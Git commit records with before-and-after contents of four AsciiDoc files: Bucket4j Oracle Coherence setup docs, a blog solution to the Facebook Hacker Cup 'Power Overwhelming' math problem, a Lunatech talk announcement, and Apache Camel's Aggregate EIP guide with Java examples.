{"commit":"382aab0941e431b5d7d6b1706f232cc5fe5b9fa7","subject":"coherence.adoc","message":"coherence.adoc\n","repos":"vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j","old_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/jcache\/coherence.adoc","new_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/jcache\/coherence.adoc","new_contents":"[[bucket4j-coherence, Bucket4j-Coherence]]\n=== Oracle Coherence integration\n==== Dependencies\nTo use the ``bucket4j-coherence`` extension you need to add the following dependency:\n[source, xml, subs=attributes+]\n----\n<dependency>\n <groupId>com.github.vladimir-bukhtoyarov<\/groupId>\n <artifactId>bucket4j-coherence<\/artifactId>\n <version>{revnumber}<\/version>\n<\/dependency>\n----\n\n==== Example of Bucket instantiation\n[source, java]\n----\ncom.tangosol.net.NamedCache<K, byte[]> cache = ...;\nprivate static final CoherenceProxyManager<K> proxyManager = new CoherenceProxyManager(cache);\n\n...\nBucketConfiguration configuration = BucketConfiguration.builder()\n .addLimit(Bandwidth.simple(1_000, Duration.ofMinutes(1)))\n .build();\n\nBucket bucket = proxyManager.builder().build(key, configuration);\n----\n\n==== Configuring POF serialization for Bucket4j library classes\nIf you configure nothing, then by default Java serialization will be used for serializing Bucket4j library classes. 
Java serialization can be rather slow and should be avoided in general.\n``Bucket4j`` provides https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG1363[custom POF serializers] for all library classes that could be transferred over the network.\nTo let Coherence know about POF serializers you should register the following serializer in the POF configuration file:\n====\n``io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer`` for class ``io.github.bucket4j.grid.coherence.CoherenceProcessor``\n====\n\n.Example of POF serialization config:\n[source, xml]\n----\n<pof-config xmlns=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config coherence-pof-config.xsd\">\n\n <user-type-list>\n <!-- Include default Coherence types -->\n <include>coherence-pof-config.xml<\/include>\n\n <!-- Define serializers for Bucket4j classes -->\n <user-type>\n <type-id>1001<\/type-id>\n <class-name>io.github.bucket4j.grid.coherence.CoherenceProcessor<\/class-name>\n <serializer>\n <class-name>io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer<\/class-name>\n <\/serializer>\n <\/user-type>\n <\/user-type-list>\n<\/pof-config>\n----\nDouble-check with https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG5182[official Oracle Coherence documentation] in case of any questions related to ``Portable Object Format``.\n","old_contents":"[[bucket4j-coherence, Bucket4j-Coherence]]\n=== Oracle Coherence integration\n==== Dependencies\nTo use ``bucket4j-coherence`` extension you need to add following dependency:\n[source, xml, subs=attributes+]\n----\n<dependency>\n <groupId>com.github.vladimir-bukhtoyarov<\/groupId>\n <artifactId>bucket4j-coherence<\/artifactId>\n <version>{revnumber}<\/version>\n<\/dependency>\n----\n\n==== Example of Bucket instantiation\n[source, java]\n----\ncom.tangosol.net.NamedCache<K, byte[]> cache = ...;\nprivate static final CoherenceProxyManager<K> proxyManager = new CoherenceProxyManager(map);\n\n...\nBucketConfiguration configuration = BucketConfiguration.builder()\n .addLimit(Bandwidth.simple(1_000, Duration.ofMinutes(1)))\n .build(key, configuration);\n\nBucket bucket = proxyManager.builder().build(configuration);\n----\n\n==== Configuring POF serialization for Bucket4j library classes\nIf you configure nothing, then by default Java serialization will be used for serialization Bucket4j library classes. 
Java serialization can be rather slow and should be avoided in general.\n``Bucket4j`` provides https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG1363[custom POF serializers] for all library classes that could be transferred over network.\nTo let Coherence know about POF serializers you should register three serializers in the POF configuration config file: \n====\n``io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer`` for class ``io.github.bucket4j.grid.coherence.CoherenceProcessor``\n====\n\n.Example of POF serialization config:\n[source, xml]\n----\n<pof-config xmlns=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config coherence-pof-config.xsd\">\n\n <user-type-list>\n <!-- Include default Coherence types -->\n <include>coherence-pof-config.xml<\/include>\n\n <!-- Define serializers for Bucket4j classes -->\n <user-type>\n <type-id>1001<\/type-id>\n <class-name>io.github.bucket4j.grid.coherence.CoherenceProcessor<\/class-name>\n <serializer>\n <class-name>io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer<\/class-name>\n <\/serializer>\n <\/user-type>\n <\/user-type-list>\n<\/pof-config>\n----\nDouble check with https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG5182[official Oracle Coherence documentation] in case of any questions related to ``Portable Object Format``.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5348ee0293ba0a0bbf6e666f5f9c1f496c08ce4b","subject":"Update 2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","message":"Update 2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","new_file":"_posts\/2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","new_contents":"= Facebook hacker cup: Power Overwhelming\n:hp-tags: competitions, migrated\n\nYou are to inflict maximum damage to the zerg army. There are two types of units - Warrior and Shield. Warriors do damage every second, while a shield protects your entire army for one second. Your army is instantly overrun after the shield generators expire. Given \\(G\\) cost to build a shield, \\(W\\) cost to build a warrior and total money \\(M\\), how many shields would you build?\n\n=== Solution\n\nLet \\(X\\) and \\(Y\\) be the optimal number of generators and number of warriors to be built, respectively. Let's start with a simple concrete example. Suppose shields and warriors both cost 1 unit and you have total money of 5 units. Also assume 1 unit of damage per warrior. What is the optimum value of \\(X\\) and \\(Y\\)? It would be optimum if you can inflict maximum damage. With 5 units of money, you can buy shields\/warriors in the following combinations.\n\n.Combinations of \\(X, Y\\)\n|===\n|X |Y |Damage\n\n|1\n|4\n|4\n\n|2\n|3\n|6\n\n|3\n|2\n|6\n\n|4\n|1\n|4\n|===\n\nIn this case, the optimal choices of \\(X, Y\\) seem to be \\((2, 3)\\) and \\((3, 2)\\), both of which maximize the product \\(XY\\). In the general case, the cost to buy \\(X\\) generators is \\(XG\\), cost to buy \\(Y\\) warriors is \\(YW\\). Since we are limited by \\(M\\) amount of money, \\(X, Y\\) must satisfy \\(XG + YW \\le M\\). 
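To state the goal explicitly (this is only a restatement of the constraints above, not extra input from the problem), we are solving the small integer program\n\n\\(\\max_{X, Y \\in \\mathbb{Z}_{\\ge 0}} XY \\quad \\text{subject to} \\quad XG + YW \\le M\\)\n\n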
This can be represented as a line and the inequality encapsulates a region for candidate \\((X, Y)\\) values.\n\n.Candidate solution region\nimage::post2\/fig1.png[]\n\nWe want \\((X, Y) = \\arg\\max{XY}\\). Geometrically, \\(XY\\) represents the area of the rectangle shaded in blue.\n\n.The area to be maximized\nimage::post2\/fig2.png[]\n\nWe need to find integer values of \\(X, Y\\) that maximize this area. \n\nHow do we go about doing that?\nWe know that the line will intersect the X and Y axes at \\(M\/G\\) and \\(M\/W\\) respectively. \nWe also know that the optimal rectangle touches the line. If it doesn't, the area can be trivially increased by increasing either\/both \\(X, Y\\) values until it touches the line.\n\nThe boring calculus way for figuring this out is as follows:\n\n\\(A = XY \\\\\nA = \\frac{M - YW}{G}Y \\\\\n\\\\\n\\frac{\\partial A}{\\partial Y} = \\frac{M - 2WY}{G} \\\\\n\\arg\\max{A} \\implies \\frac{M - 2WY}{G} = 0 \\\\\nY = M \/ 2W \\)\n\nThis gives the corresponding \\(X = M\/2G\\).\n\nA more interesting way to arrive at the same conclusion would be to think as follows:\n- The shaded rectangle increases its area as long as X and Y increase.\n- Start with \\((0, 0)\\) and increase both \\(X, Y\\) by 1. This gives us a small rectangle with bottom left \\((0, 0)\\) and top right \\((1, 1)\\).\n- If the straight line were \\(X + Y = 1\\), the feasible region would be a right-angled isosceles triangle. The \\(X, Y\\) values would always increase in the direction of the line \\(Y = X\\), which would cut the line in the middle at \\((1\/2, 1\/2)\\).\n- Generalizing this, the product \\(XY\\) will increase as long as we go in the direction of the line that joins \\((0, 0)\\) to the midpoint of the line \\(XG + YW = M\\). The midpoint of this line is, unsurprisingly, \\((M\/2G, M\/2W)\\).\n\nThere are other ways to arrive at this. Perhaps I should write a post that exclusively deals with this problem.\n\nComing back to our original question, the optimal number of shields must be \\(M\/2G\\). If \\(M\/2G\\) is not an integer, we go towards the origin on the line that joins \\((0, 0)\\) and \\((M\/2G, M\/2W)\\). However, I was able to get away by taking \\(\\lfloor M\/2G \\rfloor\\).","old_contents":"= Facebook hacker cup: Power Overwhelming\n:hp-tags: competitions, migrated\n\nYou are to inflict maximum damage to the zerg army. There are two types of units - Warrior and Shield. Warriors do damage every second, while a shield protects your entire army for one second. Your army is instantly overrun after the shield generators expire. Given \\(G\\) cost to build a shield, \\(W\\) cost to build a warrior and total money \\(M\\), how many shields would you build?\n\n=== Solution\n\nLet \\(X\\) and \\(Y\\) be the optimal number of generators and number of warriors to be built, respectively. Let's start with a simple concrete example. Suppose shields and warriors both cost 1 unit and you have total money of 5 units. Also assume 1 unit of damage per warrior. What is the optimum value of \\(X\\) and \\(Y\\)? It would be optimum if you can inflict maximum damage. With 5 units of money, you can buy shields\/warriors in the following combinations.\n\n.Combinations of \\(X, Y\\)\n|===\n|X |Y |Damage\n\n|1\n|4\n|4\n\n|2\n|3\n|6\n\n|3\n|2\n|6\n\n|4\n|1\n|4\n|===\n\nIn this case, the optimal choice of \\(X, Y\\) seem to be \\((2, 3)\\) and \\((3, 4)\\) respectively, both of which maximize the product \\(XY\\). In the general case, the cost to buy \\(X\\) generators is \\(XG\\), cost to buy \\(Y\\) warriors is \\(YW\\). 
Since we are limited by \\(M\\) amount of money, \\(X, Y\\) must satisfy \\(XG + YW \\le M\\). This can be represented as a line and the inequality encapsulates a region for candidate \\((X, Y)\\) values.\n\n.Candidate solution region\nimage::post2\/fig1.png[]\n\nWe want \\(X, Y \\mid \\arg\\max{XY} \\). Geometrically, \\(XY\\) represents the area of the rectangle shaded in blue.\n\n.The area to be maximized\nimage::post2\/fig2.png[]\n\nWe need to find integer values of \\(X, Y\\) that maximize this area. \n\nHow do we go about doing that?\nWe know that the line will intersect X and Y axis at \\(M\/G, M\/W\\). \nWe also know that the optimal rectangle touches the line. If it doesn't, the area can be trivially increased by increasing either\/both \\(X, Y\\) values until it touches the line.\n\nThe boring calculus way for figuring this out is as follows:\n\\(A = XY \\\\\nA = \\frac{M - YW}{G}Y \\\\\n\\\\\n\\frac{\\partial A}{\\partial Y} = \\frac{Y(M - WY)}{G} \\\\\n\\arg\\max{A} \\implies \\frac{Y(M - WY)}{G} = 0 \\\\\nY = M \/ 2W \\)\n\nThis gives corresponding \\(X = M\/2G\\)\n\nA more interesting way to arrive at the same conclusion would be to think as follows:\n- The shaded triangle increases its area as long as X and Y increase.\n- Start with \\((0, 0)\\) and increase both \\(X, Y\\) by 1. This gives us a small rectangle with bottom left \\((0, 0)\\) and top right \\((1, 1)\\).\n- If the straight line was X + Y = 1, it would be a right angled isosceles triangle. The \\(X, Y\\) value would always increase in the direction of line \\(Y = X\\), which would cut the line in middle at \\((X\/2, Y\/2)\\)\n- Generalizing this, the value of \\(X. Y\\) will increase as long as we go on the direction of line that joins \\((0, 0)\\) to midpoint of the line \\(XG + YW = M\\). The mid point of this line is, unsurprisingly, \\(M\/2G, M\/2W)\\)\n\nThere are other ways to arrive at this. Perhaps I should write a post that exclusively deals with this problem.\n\nComing back to our original question, the optimal number of shields must be \\(M\/2G\\). If, \\(M\/2G\\) is not an integer, we go towards the origin on the line that joins \\((0, 0)\\) and \\(M\/2G, M\/2W)\\). However,I was able to get away by taking \\(\\lfoor M\/2G \\rfloor\\).","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d6333fbdfcd20cda330b9ede566e05819dcef3ad","subject":"Update 2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","message":"Update 2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","new_file":"_posts\/2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","new_contents":"# Clever Cloud\u2019s CEO to speak at Lunatech\n\n:published_at: 2016-05-26\n:hp-tags: company\n\nFriday 27 May 2016 Clever Cloud\u2019s CEO, *Quentin Adam*, will be visiting Lunatech where he will give a presentation about using Clever Cloud with Scala.\n\nClever Cloud is a \u201cEurope-based PaaS company\u201d that helps \u201cdevelopers deploy and run their apps with bulletproof infrastructure, automatic scaling, fair pricing\u201d and aims \u201cto make an easy-to-use service, without any vendor lock-in\u201d.\n\nDue to his experience at Clever Cloud \u2014 where he can work with a wide range of technologies and tools \u2014 he has a lot of knowledge and is able to speak about many different subjects. 
He regularly speaks at various tech conferences.\n\nWe are opening up the presentation to everyone. Feel free to join us at 16:00.","old_contents":"# Clever Cloud\u2019s CEO to speak at Lunatech\n\n:published_at: 2016-01-25\n:hp-tags: company\n\nFriday 27 May 2016 Clever Cloud\u2019s CEO, *Quentin Adam*, will be visiting Lunatech where he will give a presentation about using Clever Cloud with Scala.\n\nClever Cloud is a \u201cEurope-based PaaS company\u201d that helps \u201cdevelopers deploy and run their apps with bulletproof infrastructure, automatic scaling, fair pricing\u201d and aims \u201cto make an easy-to-use service, without any vendor lock-in\u201d.\n\nDue to his experience at Clever Cloud \u2014 where he can work a wide range of technologies and tools \u2014 he has a lot of knowledge and is able to speak about many different subjects. He regularly speaks at various tech conferences.\n\nWe are opening up the presentation to everyone. Feel free to join us at 16:00.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8773de13b5fde62c748d8cf4f563f0b919180f59","subject":"CAMEL-16861: Cleanup docs","message":"CAMEL-16861: Cleanup docs\n","repos":"cunningt\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,apache\/camel,christophd\/camel,christophd\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,apache\/camel,pax95\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,pax95\/camel,tadayosi\/camel","old_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/aggregate-eip.adoc","new_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/aggregate-eip.adoc","new_contents":"= Aggregate EIP\n:doctitle: Aggregate\n:shortname: aggregate\n:description: Aggregates many messages into a single message\n:since: \n:supportlevel: Stable\n\nThe\nhttp:\/\/www.enterpriseintegrationpatterns.com\/Aggregator.html[Aggregator]\nfrom the xref:enterprise-integration-patterns.adoc[EIP patterns] allows\nyou to combine a number of messages together into a single message.\n\nHow do we combine the results of individual, but related messages so that they can be processed as a whole?\n\nimage::eip\/Aggregator.gif[image]\n\nUse a stateful filter, an Aggregator, to collect and store individual messages until a complete set of related messages has been received. 
Then, the Aggregator publishes a single message distilled from the individual messages.\n\nThe aggregator is one of the most complex EIPs and has many features and configurations.\n\nThe logic for combining messages together is _correlated_ in buckets based on a _correlation key_.\nMessages with the same correlation key are aggregated together, using an `AggregationStrategy`.\n\n== Aggregate options\n\n\/\/ eip options: START\ninclude::partial$eip-options.adoc[]\n\/\/ eip options: END\n\n== Worker pools\n\nThe aggregate EIP will always use a worker pool, which is used to process all the outgoing messages from the aggregator.\nThe worker pool is determined accordingly:\n\n- If a custom `ExecutorService` has been configured, then this is used as the worker pool.\n- If `parallelProcessing=true` then a _default_ worker pool (10 worker threads by default) is created.\nHowever, the thread pool size and other configurations can be configured using _thread pool profiles_.\n- Otherwise, a single-threaded worker pool is created.\n\n== Aggregating\n\nThe `AggregationStrategy` is used for aggregating the old and the new exchange together into a single exchange,\nwhich becomes the next old exchange when the next message is aggregated, and so forth.\n\nPossible implementations include performing some kind of combining or\ndelta processing, such as adding line items together into an invoice or\njust using the newest exchange and removing old exchanges such as for\nstate tracking or market data prices, where old values are of little\nuse.\n\nNotice the aggregation strategy is a mandatory option and must be\nprovided to the aggregator.\n\nIMPORTANT: In the aggregate method, do not create a new exchange instance to return,\ninstead return either the old or new exchange from the input parameters;\nfavor returning the old exchange whenever possible.\n\nHere are a few example `AggregationStrategy` implementations that should\nhelp you create your own custom strategy.\n\n[source,java]\n----\n\/\/simply combines Exchange String body values using '+' as a delimiter\nclass StringAggregationStrategy implements AggregationStrategy {\n\n    public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n        if (oldExchange == null) {\n            return newExchange;\n        }\n\n        String oldBody = oldExchange.getIn().getBody(String.class);\n        String newBody = newExchange.getIn().getBody(String.class);\n        oldExchange.getIn().setBody(oldBody + \"+\" + newBody);\n        return oldExchange;\n    }\n}\n\n\/\/simply combines Exchange body values into an ArrayList<Object>\nclass ArrayListAggregationStrategy implements AggregationStrategy {\n\n    public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n        Object newBody = newExchange.getIn().getBody();\n        ArrayList<Object> list = null;\n        if (oldExchange == null) {\n            list = new ArrayList<Object>();\n            list.add(newBody);\n            newExchange.getIn().setBody(list);\n            return newExchange;\n        } else {\n            list = oldExchange.getIn().getBody(ArrayList.class);\n            list.add(newBody);\n            return oldExchange;\n        }\n    }\n}\n----\n\nTIP: The `org.apache.camel.builder.AggregationStrategies` is a builder that can\nbe used for creating commonly used aggregation strategies without having to create a class.\n\n=== Exchange Properties\n\nThe completed (outgoing) exchange from the Aggregate EIP contains the following information\nas exchange properties, allowing you to know how the exchange was completed, and how\nmany messages were 
combined.\n\n[width=\"100%\",cols=\"3,1m,6\",options=\"header\"]\n|=======================================================================\n| Property | Type | Description\n| `CamelAggregatedSize` | `int` | The total number of messages aggregated.\n| `CamelAggregatedCompletedBy` | `String` | The condition that triggered the completion. Possible values are size, timeout, interval, predicate, force, strategy, and consumer. The consumer value represents the completion from batch consumer.\n| `CamelAggregatedCorrelationKey` | `String` | The correlation identifier as a `String`.\n| `CamelAggregatedTimeout` | `long` | The time-out in milliseconds as set by the completion time-out.\n|=======================================================================\n\n\n=== Aggregate by grouping exchanges\n\nIn the route below we group all the exchanges together using\n`GroupedExchangeAggregationStrategy`:\n\n[source,java]\n----\nfrom(\"direct:start\")\n \/\/ aggregate all using same expression and group the\n \/\/ exchanges so we get one single exchange containing all\n \/\/ the others\n .aggregate(new GroupedExchangeAggregationStrategy()).constant(true)\n \/\/ wait for 0.5 seconds to aggregate\n .completionTimeout(500L).to(\"mock:result\");\n----\n\nAs a result we have one outgoing `Exchange` being\nrouted to the `\"mock:result\"` endpoint. The exchange is a holder\ncontaining all the incoming Exchanges.\n\nThe output of the aggregator will then contain the exchanges grouped\ntogether in a list as shown below:\n\n[source,java]\n----\nList<Exchange> grouped = exchange.getMessage().getBody(List.class);\n----\n\n=== Aggregating into a List\n\nIf you want to aggregate some value from the messages `<V>` into a `List<V>`\nthen you can use the\n`org.apache.camel.processor.aggregate.AbstractListAggregationStrategy`\nabstract class.\n\nThe completed Exchange that is sent out of the aggregator will contain the `List<V>` in\nthe message body.\n\nFor example to aggregate a `List<Integer>` you can extend this class as\nshown below, and implement the `getValue` method:\n\n[source,java]\n----\npublic class MyListOfNumbersStrategy extends AbstractListAggregationStrategy<Integer> {\n\n @Override\n public Integer getValue(Exchange exchange) {\n \/\/ the message body contains a number, so just return that as-is\n return exchange.getIn().getBody(Integer.class);\n }\n}\n----\n\nThe `org.apache.camel.builder.AggregationStrategies` is a builder that can\nbe used for creating commonly used aggregation strategies without having to create a class.\n\nThe previous example can also be built using the builder as shown:\n\n[source,java]\n----\nAggregationStrategy agg = AggregationStrategies.flexible(Integer.class)\n .accumulateInCollection(ArrayList.class)\n .pick(body());\n----\n\n=== Aggregating on timeout\n\nIf your aggregation strategy implements\n`TimeoutAwareAggregationStrategy`, then Camel will invoke the `timeout`\nmethod when the timeout occurs. Notice that the values for index and\ntotal parameters will be -1, and the timeout parameter will be provided\nonly if configured as a fixed value. 
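For illustration, a minimal sketch of such a strategy (the class name and the header set in `timeout` are made up for this example; the aggregation logic reuses the string-appending idea from earlier):\n\n[source,java]\n----\npublic class MyTimeoutAwareStrategy implements TimeoutAwareAggregationStrategy {\n\n    public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n        if (oldExchange == null) {\n            return newExchange;\n        }\n        String body = oldExchange.getIn().getBody(String.class)\n                + \"+\" + newExchange.getIn().getBody(String.class);\n        oldExchange.getIn().setBody(body);\n        return oldExchange;\n    }\n\n    public void timeout(Exchange oldExchange, int index, int total, long timeout) {\n        \/\/ index and total are -1 here; timeout is only set when configured as a fixed value\n        \/\/ mark the partially aggregated exchange so downstream processing can react\n        oldExchange.getIn().setHeader(\"timedOut\", true);\n    }\n}\n----\n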
You must *not* throw any exceptions\nfrom the `timeout` method.\n\n=== Aggregate with persistent repository\n\nThe aggregator provides a pluggable repository abstraction, allowing you to implement\nyour own `org.apache.camel.spi.AggregationRepository`.\n\nIf you need a persistent repository, then Camel provides numerous implementations, such as from the\nxref:ROOT:caffeine-cache-component.adoc[Caffeine],\nxref:ROOT:cql-component.adoc[CassandraQL],\nxref:ROOT:ehcache-component.adoc[EHCache],\nxref:ROOT:infinispan-component.adoc[Infinispan],\nxref:ROOT:jcache-component.adoc[JCache],\nxref:others:leveldb.adoc[LevelDB],\nxref:others:redis.adoc[Redis],\nor xref:ROOT:sql-component.adoc[SQL] components.\n\n== Completion\n\nWhen aggregating xref:manual::exchange.adoc[Exchange]s, at some point you need to\nindicate that the aggregated exchanges are complete, so they can be sent\nout of the aggregator. Camel allows you to indicate completion in\nvarious ways as follows:\n\n* _completionTimeout_ - An inactivity timeout, which is triggered if\nno new exchanges have been aggregated for that particular correlation\nkey within the period.\n* _completionInterval_ - Once every X period all the current aggregated\nexchanges are completed.\n* _completionSize_ - A number indicating that the aggregation is complete after X aggregated\nexchanges.\n* _completionPredicate_ - Runs a xref:manual::predicate.adoc[Predicate] when a new\nexchange is aggregated to determine if we are complete or not.\nThe configured aggregationStrategy can implement the\nPredicate interface and will be used as the completionPredicate if no\ncompletionPredicate is configured. The configured aggregationStrategy can\noverride the `preComplete` method and will be used as\nthe completionPredicate in pre-complete check mode. See further below\nfor more details.\n* _completionFromBatchConsumer_ - Special option for\nxref:manual::batch-consumer.adoc[Batch Consumer] which allows you to complete\nwhen all the messages from the batch have been aggregated.\n* _forceCompletionOnStop_ - Indicates to complete all current\naggregated exchanges when the context is stopped.\n* _AggregateController_ - Allows using an external source (`AggregateController` implementation) to complete groups or all groups.\nThis can be done using the Java or JMX API.\n\nAll the different completions are per correlation key. You can\ncombine them in any way you like; basically, the first one that\ntriggers wins. So you can use a completion size together with a\ncompletion timeout, as shown in the sketch below. 
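As a rough sketch (the endpoint URIs and correlation header are illustrative, and `StringAggregationStrategy` is the example strategy from earlier):\n\n[source,java]\n----\nfrom(\"direct:start\")\n    \/\/ correlate messages by a header value\n    .aggregate(header(\"myId\"), new StringAggregationStrategy())\n        \/\/ complete a group when it reaches 100 messages,\n        \/\/ or when it has been inactive for 3 seconds\n        .completionSize(100)\n        .completionTimeout(3000)\n    .to(\"mock:result\");\n----\n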
The only restriction is that completionTimeout and completionInterval cannot\nbe used at the same time.\n\nCompletion is mandatory and must be configured on the aggregation.\n\n=== Pre-completion mode\n\nThere can be use-cases where you want the incoming\nxref:manual::exchange.adoc[Exchange] to determine if the correlation group\nshould pre-complete, with the incoming\nxref:manual::exchange.adoc[Exchange] then starting a new group from scratch.\nThe pre-completion mode must be enabled by the `AggregationStrategy` by overriding the `canPreComplete` method\nto return a `true` value.\n\nWhen pre-completion is enabled, the `preComplete` method is invoked:\n\n[source,java]\n----\n\/**\n * Determines if the aggregation should complete the current group, and start a new group, or the aggregation\n * should continue using the current group.\n *\n * @param oldExchange the oldest exchange (is <tt>null<\/tt> on first aggregation as we only have the new exchange)\n * @param newExchange the newest exchange (can be <tt>null<\/tt> if there was no data possible to acquire)\n * @return <tt>true<\/tt> to complete current group and start a new group, or <tt>false<\/tt> to keep using current\n *\/\nboolean preComplete(Exchange oldExchange, Exchange newExchange);\n----\n\nIf the `preComplete` method returns `true`, then the existing correlation group is\ncompleted (without aggregating the incoming exchange, `newExchange`).\nThen the `newExchange` is used to start the correlation group from scratch,\nso the group would contain only that new incoming exchange. This is\nknown as pre-completion mode.\n\nWhen the aggregation is in _pre-completion_ mode, then only the following completions are in use:\n\n* _completionTimeout_ or _completionInterval_ can also be used as fallback\ncompletions\n* any other completions are not used (such as by size, from batch consumer, etc.)\n* _eagerCheckCompletion_ is implied as `true`, but the option has no effect\n\n=== CompletionAwareAggregationStrategy\n\nIf your aggregation strategy implements\n`CompletionAwareAggregationStrategy`, then Camel will invoke the\n`onCompletion` method when the aggregated `Exchange` is completed. This\nallows you to do any last-minute custom logic such as to clean up some\nresources, or additional work on the exchange as it's now completed.\nYou must *not* throw any exceptions from the `onCompletion` method.\n\n=== Completing current group decided from the AggregationStrategy\n\nThe `AggregationStrategy` supports checking for the exchange property (`Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP`)\non the returned `Exchange` that contains a boolean to indicate if the current\ngroup should be completed. This allows you to overrule any existing\ncompletion predicates \/ sizes \/ timeouts etc., and complete the group.\n\nFor example, the following logic will complete the\ngroup if the message body size is larger than 5. 
\n=== Completing the current group decided from the AggregationStrategy\n\nThe `AggregationStrategy` supports checking for the exchange property (`Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP`)\non the returned `Exchange`, which contains a boolean to indicate if the current\ngroup should be completed. This allows overruling any existing\ncompletion predicates \/ sizes \/ timeouts etc., and completing the group.\n\nFor example the following logic will complete the\ngroup if the message body is 5 characters or larger. This is done by setting\nthe exchange property `Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP` to `true`.\n\n[source,java]\n----\npublic final class MyCompletionStrategy implements AggregationStrategy {\n @Override\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n return newExchange;\n }\n String body = oldExchange.getIn().getBody(String.class) + \"+\"\n + newExchange.getIn().getBody(String.class);\n oldExchange.getIn().setBody(body);\n if (body.length() >= 5) {\n oldExchange.setProperty(Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP, true);\n }\n return oldExchange;\n }\n}\n----\n\n=== Completing all previous groups decided from the AggregationStrategy\n\nThe `AggregationStrategy` checks an exchange property, on the returned exchange,\nindicating if all previous groups should be completed.\n\nThis allows overruling any existing\ncompletion predicates \/ sizes \/ timeouts etc., and completing all the existing\nprevious groups.\n\nThe following logic will complete all the\nprevious groups, and start a new aggregation group.\n\nThis is done by setting the property `Exchange.AGGREGATION_COMPLETE_ALL_GROUPS` to `true`\non the returned exchange.\n\n[source,java]\n----\npublic final class MyCompletionStrategy implements AggregationStrategy {\n @Override\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n \/\/ we start a new correlation group, so complete all previous groups\n newExchange.setProperty(Exchange.AGGREGATION_COMPLETE_ALL_GROUPS, true);\n return newExchange;\n }\n\n String body1 = oldExchange.getIn().getBody(String.class);\n String body2 = newExchange.getIn().getBody(String.class);\n\n oldExchange.getIn().setBody(body1 + body2);\n return oldExchange;\n }\n}\n----\n\n=== Manually force the completion of all aggregated Exchanges immediately\n\nYou can manually trigger completion of all current aggregated exchanges\nby sending an exchange containing the exchange property\n`Exchange.AGGREGATION_COMPLETE_ALL_GROUPS` set to `true`. The message is\nconsidered a signal message only; the message headers\/contents will not\nbe processed otherwise.\n\nYou can alternatively set the exchange property\n`Exchange.AGGREGATION_COMPLETE_ALL_GROUPS_INCLUSIVE` to `true` to trigger\ncompletion of all groups after processing the current message.
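\n\nFor instance, the signal message could be sent with a `ProducerTemplate`; a minimal sketch, where the endpoint name and message body are illustrative:\n\n[source,java]\n----\nProducerTemplate template = camelContext.createProducerTemplate();\n\/\/ the body is a signal only; the property tells the aggregator to complete all groups\ntemplate.sendBodyAndProperty(\"direct:start\", \"SIGNAL\", Exchange.AGGREGATION_COMPLETE_ALL_GROUPS, true);\n----\n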
